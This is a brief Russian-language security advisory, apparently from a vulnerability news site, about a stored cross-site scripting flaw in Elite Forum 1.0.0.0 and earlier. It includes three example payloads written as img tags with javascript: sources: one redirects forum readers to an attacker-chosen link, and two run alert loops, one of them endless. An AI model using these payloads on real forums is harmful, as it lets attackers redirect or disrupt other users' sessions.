Программа: Elite Forum 1.0.0.0 и более ранние версии

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
обнаружена при обработке входных данных.
Удаленный пользователь может создать
специально сформированное сообщение и
выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого
сайта.

Пример:

< img src="javascript:void(window.location=(‘imagelink’))"> —
Replace the imagelink with the link to the image you want to redirect the users
viewing the topic containing this code.

<img src="javascript:a=100;while(a>=0){alert(a);a—}">

<img src="javascript:a=1;while(a>0){alert("sup?")">

Оставить мнение